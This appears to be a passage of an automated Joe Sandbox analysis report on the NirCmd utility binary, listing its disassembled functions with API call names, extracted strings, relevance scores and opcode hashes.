                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ??2@??3@sprintf$memcpymemset
                                                                                                                                                          • String ID: %2.2X $%8.8X
                                                                                                                                                          • API String ID: 1143686992-259817711
                                                                                                                                                          • Opcode ID: 0512638cd9aab043cf947234bfc81342e3b97f1729402f81b03cccd7c9782104
                                                                                                                                                          • Instruction ID: d4aaabaf245e8d5cc93de4c3782dd1c79b35df8fb08d6a4f55dddd8635b6eacb
                                                                                                                                                          • Opcode Fuzzy Hash: 0512638cd9aab043cf947234bfc81342e3b97f1729402f81b03cccd7c9782104
                                                                                                                                                          • Instruction Fuzzy Hash: B641B37361828186EB72EF16E4807EABBA5F7987C4F454121FF890B7A6DB39C544CB00
                                                                                                                                                          Function 00000001400074BC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$System$Fileatoimemcpy$_stricmp$Localmemsetstrlen
                                                                                                                                                          • String ID: now
                                                                                                                                                          • API String ID: 825280500-2433526991
                                                                                                                                                          • Opcode ID: 6117511df2f07359ccb305127872a21b61c0feb1cfef361833448efe635b5fec
                                                                                                                                                          • Instruction ID: a72b4ff2e4fae1c90452288ecbda60d6831029c665a6bf485c2ba634d1568f9a
                                                                                                                                                          • Opcode Fuzzy Hash: 6117511df2f07359ccb305127872a21b61c0feb1cfef361833448efe635b5fec
                                                                                                                                                          • Instruction Fuzzy Hash: 24315EB2614A85A2EB52DB16F880BD96321F3897C5F904422FF4D4B679DF7DC649C700
                                                                                                                                                          Function 0000000140007950 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0000000140007A34: _stricmp.MSVCRT(?,?,?,000000014000796A,?,?,?,0000000140006868), ref: 0000000140007A4D
                                                                                                                                                          • _stricmp.MSVCRT(?,?,?,0000000140006868), ref: 0000000140007992
                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,?,?,0000000140006868), ref: 00000001400079A3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp$DirectorySystem
                                                                                                                                                          • String ID: nircmd$system$windows
                                                                                                                                                          • API String ID: 3947926286-2263510502
                                                                                                                                                          • Opcode ID: 24286c5a683e1ad1e102207b91daec6c4e99062dcfd2ed82e1094de7d190878e
                                                                                                                                                          • Instruction ID: 95820082f1dfad9cd413ba008b03d1e805ec1392f701c6d459e84ba954c76284
                                                                                                                                                          • Opcode Fuzzy Hash: 24286c5a683e1ad1e102207b91daec6c4e99062dcfd2ed82e1094de7d190878e
                                                                                                                                                          • Instruction Fuzzy Hash: 8B21C6B170828191FB66EB2BB5D07FD1650A74E7D4F144021FB4A4B7B6CA7DC5468302
                                                                                                                                                          Function 0000000140015A30 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 64registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memsetwave$CapsCloseDevsOpenQueryValue_stricmp
                                                                                                                                                          • String ID: Playback$Software\Microsoft\Multimedia\Sound Mapper
                                                                                                                                                          • API String ID: 1858156295-2460313733
                                                                                                                                                          • Opcode ID: c5968d52f9bfdcf5d41d4270faa65a3d5189f3a097c9eeb7f5e17c40126d1bc4
                                                                                                                                                          • Instruction ID: 55bd5833650db630a30255c5757654d9f040f5b6d3f529e7593af90e384d6417
                                                                                                                                                          • Opcode Fuzzy Hash: c5968d52f9bfdcf5d41d4270faa65a3d5189f3a097c9eeb7f5e17c40126d1bc4
                                                                                                                                                          • Instruction Fuzzy Hash: 29317331218A81D2EBA2DB26E8847DE63A1F78C7C5F805125F74D4FAA4DF79C555CB00
                                                                                                                                                          Function 0000000140001368 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 27libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: CreateProcessAsUserA$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                                                          • API String ID: 2238633743-3283825160
                                                                                                                                                          • Opcode ID: dd09ddf3414691f77550a5cd5b1d7c71783b1f4152c2203e3fa0a09c19da0e97
                                                                                                                                                          • Instruction ID: 32769588ed91cbdd5a75b82725a118c1390f358a92b4cca4c346fad4faa9c75f
                                                                                                                                                          • Opcode Fuzzy Hash: dd09ddf3414691f77550a5cd5b1d7c71783b1f4152c2203e3fa0a09c19da0e97
                                                                                                                                                          • Instruction Fuzzy Hash: FE019DB5601F0692EB228F66E89879833B1F38CB89F504111EE4D4B328EF7AC259C350
                                                                                                                                                          Function 0000000140014444 Relevance: 16.7, APIs: 11, Instructions: 157COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memcmp$wcscpy$memcpy$FreeTaskmemset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 790580234-0
                                                                                                                                                          • Opcode ID: 5377edad9c19119b600bdffcec7d0a844fa5ff07d6537e895289b2ffc28a7ede
                                                                                                                                                          • Instruction ID: ec63aa119e7a1bcd3f5c815dc156cca0e25f7b479da9ba17613bceb268dc4c23
                                                                                                                                                          • Opcode Fuzzy Hash: 5377edad9c19119b600bdffcec7d0a844fa5ff07d6537e895289b2ffc28a7ede
                                                                                                                                                          • Instruction Fuzzy Hash: BF710972608A8486DB61DF16E0803DEB761F789BC5F548016FB8A4BB79DF79C984CB40
                                                                                                                                                          Function 0000000140008480 Relevance: 16.6, APIs: 6, Strings: 5, Instructions: 149stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memset$memcpy$_stricmpstrcpystrtoul
                                                                                                                                                          • String ID: Cannot find the specified process !$Failed to load the process library !$bin$noascii$nohex
                                                                                                                                                          • API String ID: 2828473317-4186054902
                                                                                                                                                          • Opcode ID: b11b0edaf118934a1e3b0fd725ab0a1f49b549194fc5772f56e804947c2be8fb
                                                                                                                                                          • Instruction ID: c4246e8aeb1b09d522a7b9ceb8c747f1cebdfea575450eccd664a85fc6c4edac
                                                                                                                                                          • Opcode Fuzzy Hash: b11b0edaf118934a1e3b0fd725ab0a1f49b549194fc5772f56e804947c2be8fb
                                                                                                                                                          • Instruction Fuzzy Hash: 1261B2B2304A8182FB66DB12F4847EA73A1F78C7C5F814022FB4A4B6A5DF3AC509C740
                                                                                                                                                          Function 0000000140001E7C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 58libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AddressFreeProc$Load
                                                                                                                                                          • String ID: CreateAssemblyCache$LoadLibraryShim$fusion.dll$mscoree.dll
                                                                                                                                                          • API String ID: 3420977620-2307797259
                                                                                                                                                          • Opcode ID: 50588b5598b9c0ae0d2f9735c525b11cd504cf645931b6b28f59f02a46e89812
                                                                                                                                                          • Instruction ID: 1393aae09e6bf67bcb02c3eb5f9086c94f348a6fca0cba41cab007e3e729673e
                                                                                                                                                          • Opcode Fuzzy Hash: 50588b5598b9c0ae0d2f9735c525b11cd504cf645931b6b28f59f02a46e89812
                                                                                                                                                          • Instruction Fuzzy Hash: 7E211A72212B4592FF96DF26F4947E963B0EB8CB88F484425AB0E4B2B8DF38C554C350
                                                                                                                                                          Function 0000000140005BD8 Relevance: 15.1, APIs: 10, Instructions: 137COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: mixer$memset$ControlDetailsLine$CloseControlsInfoOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1974157972-0
                                                                                                                                                          • Opcode ID: f806d902107087c5b61bdf7660ce082892fe561e9d7cf6d6f43e3b63787a81cc
                                                                                                                                                          • Instruction ID: da571eb776e3099fde167cbb4d8733a9ab63f6cfcc4c1d4c023c3e601d5e512d
                                                                                                                                                          • Opcode Fuzzy Hash: f806d902107087c5b61bdf7660ce082892fe561e9d7cf6d6f43e3b63787a81cc
                                                                                                                                                          • Instruction Fuzzy Hash: 476169B26186808BE761DF16E084B9FB7B1F7C9785F504016EB8987A68DB79C545CF00
                                                                                                                                                          Function 0000000140012368 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memset$strcpy$CloseHandleOpenProcessVersion
                                                                                                                                                          • String ID: :
                                                                                                                                                          • API String ID: 2802433453-336475711
                                                                                                                                                          • Opcode ID: ed97459e9d1533e4adcfaa244eefaa4f0d2c8120d288d520d807d16219259328
                                                                                                                                                          • Instruction ID: 57d403b5d6326198616a6fb5e0e2865e9545386ca3d298a61dba7f6935a76028
                                                                                                                                                          • Opcode Fuzzy Hash: ed97459e9d1533e4adcfaa244eefaa4f0d2c8120d288d520d807d16219259328
                                                                                                                                                          • Instruction Fuzzy Hash: 69516E72208A81D6EB72DB16E4947DAB3A5F7887C4F404125FB884BBA8DF3EC555CB00
                                                                                                                                                          Function 0000000140012164 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: strcpy$DirectoryWindowsmemsetstrcatstrchr
                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                          • API String ID: 359661927-1821301763
                                                                                                                                                          • Opcode ID: e292e933170d71e49ee4c2042818374fff645c96ae4e9559add9145ef496c711
                                                                                                                                                          • Instruction ID: e3701d57e88e19db89750a25ffa78663da6487f760b0d23193bdbba7164cdaf6
                                                                                                                                                          • Opcode Fuzzy Hash: e292e933170d71e49ee4c2042818374fff645c96ae4e9559add9145ef496c711
                                                                                                                                                          • Instruction Fuzzy Hash: 7D213D71308640A1EA26EB12E9843DA6251BB9D7C4F848162BB5E4F6A9DB3EC645C700
                                                                                                                                                          Function 00000001400027D0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46stringlibrarywindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                          • API String ID: 3198317522-572158859
                                                                                                                                                          • Opcode ID: 9f6409db640a2fe0525687c2b78c9b5cf147ed6bf5d743e1044b12acb2c0afb6
                                                                                                                                                          • Instruction ID: 47a6bb3a5416b77daeb734d859dbf161d15d0202b5ba6ce46996740a9ad02959
                                                                                                                                                          • Opcode Fuzzy Hash: 9f6409db640a2fe0525687c2b78c9b5cf147ed6bf5d743e1044b12acb2c0afb6
                                                                                                                                                          • Instruction Fuzzy Hash: 35115572719A8082EB11DB17F84439AA3A2F78CBD5F088021FB494B7A9CF7DC9418B00
                                                                                                                                                          Function 0000000140001438 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 21libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                          • String ID: WTSGetActiveConsoleSessionId$WTSQueryUserToken$Wtsapi32.dll$kernel32.dll
                                                                                                                                                          • API String ID: 384173800-3706966797
                                                                                                                                                          • Opcode ID: 50e1ca6bc16f678b673df7e946e0188d09d80de742d0932e4f3e6f690e4144c4
                                                                                                                                                          • Instruction ID: fd0e5844d833db8f2a195c727fbf2f625ea62ded63bde36988852b7573f6a743
                                                                                                                                                          • Opcode Fuzzy Hash: 50e1ca6bc16f678b673df7e946e0188d09d80de742d0932e4f3e6f690e4144c4
                                                                                                                                                          • Instruction Fuzzy Hash: 66F0F270602B4691EF128F66F8547A833B0F34DB84F404011EA0D0B334EF3AC299C350
                                                                                                                                                          Function 0000000140006244 Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ??2@$??3@CloseErrorFileHandleLastProcesssprintf$CreateMemoryOpenReadWritememcpymemset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2721736070-0
                                                                                                                                                          • Opcode ID: fdf874b6459075d3f620a20e108ebe1a648c61fd66d8de336c16c6a3095a5557
                                                                                                                                                          • Instruction ID: 244d93e89496cde2c486d158242e55ee9fdd52e08706edafe97e94249b6accaf
                                                                                                                                                          • Opcode Fuzzy Hash: fdf874b6459075d3f620a20e108ebe1a648c61fd66d8de336c16c6a3095a5557
                                                                                                                                                          • Instruction Fuzzy Hash: 3F417C726086808AD761DF27B48079EB2A2F78CBE0F544125FF9A53BA4DF39C945CB40
                                                                                                                                                          Function 0000000140009E98 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Filememset$AttributesInitializeModuleNameUninitialize_stricmp
                                                                                                                                                          • String ID: Failed to create the shortcut !
                                                                                                                                                          • API String ID: 1960653633-1381529132
                                                                                                                                                          • Opcode ID: 679da1fa358a7cb17d4ab006e0bd6d38eca5062eee56c59c8dc85a6a2287029d
                                                                                                                                                          • Instruction ID: 688c3bb02abfabafa039e5d9eaf9a2f6437dd2c7131ab2e66b31093d54750994
                                                                                                                                                          • Opcode Fuzzy Hash: 679da1fa358a7cb17d4ab006e0bd6d38eca5062eee56c59c8dc85a6a2287029d
                                                                                                                                                          • Instruction Fuzzy Hash: 744181B26087C092DB22DF62F4857EEA3A5F7887D4F444126FB59876A9DF79C109C700
                                                                                                                                                          Function 0000000140004784 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _mbsicmp$memsetstrlen
                                                                                                                                                          • String ID: Primary$\\.\DISPLAY%s
                                                                                                                                                          • API String ID: 2066724005-3630482177
                                                                                                                                                          • Opcode ID: e3862853e18f7dfaf04decdd3b8ce888871b1f4aea938a0e76de89d37ba7c0a8
                                                                                                                                                          • Instruction ID: 758b8f48552c4c3d72bc4f721a57a9a995aadac2235a4d89b34babc0cf3d2b75
                                                                                                                                                          • Opcode Fuzzy Hash: e3862853e18f7dfaf04decdd3b8ce888871b1f4aea938a0e76de89d37ba7c0a8
                                                                                                                                                          • Instruction Fuzzy Hash: 703182F260468186FBB6DA27F4403EE63A1F78C7C0F058535AB4E47AA7EB39D5458704
                                                                                                                                                          Function 000000014000A01C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Filememset$AttributesInitializeModuleNameUninitialize_stricmp
                                                                                                                                                          • String ID: Failed to create the shortcut !
                                                                                                                                                          • API String ID: 1960653633-1381529132
                                                                                                                                                          • Opcode ID: ff6314fff1c03b08cd7578e637c10f064f09ba804643e9089447bb85a2e860ce
                                                                                                                                                          • Instruction ID: 67fc2121e279df186281e5c27207c334f7e405148d23e62e60de542f54edfd93
                                                                                                                                                          • Opcode Fuzzy Hash: ff6314fff1c03b08cd7578e637c10f064f09ba804643e9089447bb85a2e860ce
                                                                                                                                                          • Instruction Fuzzy Hash: 7A41B3B2208B8492DB21DF62F4857EEA3A1F7897D4F444216FB59476A5DFBDC109C700
                                                                                                                                                          Function 00000001400035B8 Relevance: 12.1, APIs: 8, Instructions: 68clipboardfileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Clipboard$CloseFileGlobal$CreateDataHandleLockOpenPointerUnlock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 809935413-0
                                                                                                                                                          • Opcode ID: 44964b5467174d849ada34be4484336f80a65893067ee09063269fe8e6dd2f9a
                                                                                                                                                          • Instruction ID: 12360110d38af5cbf7852ec671a64c4a6be2e78df0e48eb67b30b1416ece61b3
                                                                                                                                                          • Opcode Fuzzy Hash: 44964b5467174d849ada34be4484336f80a65893067ee09063269fe8e6dd2f9a
                                                                                                                                                          • Instruction Fuzzy Hash: F4217A71200A4082EB16DF27B9447A973A5F78CBD4F488225FF1A0BBB4DF7AD4458700
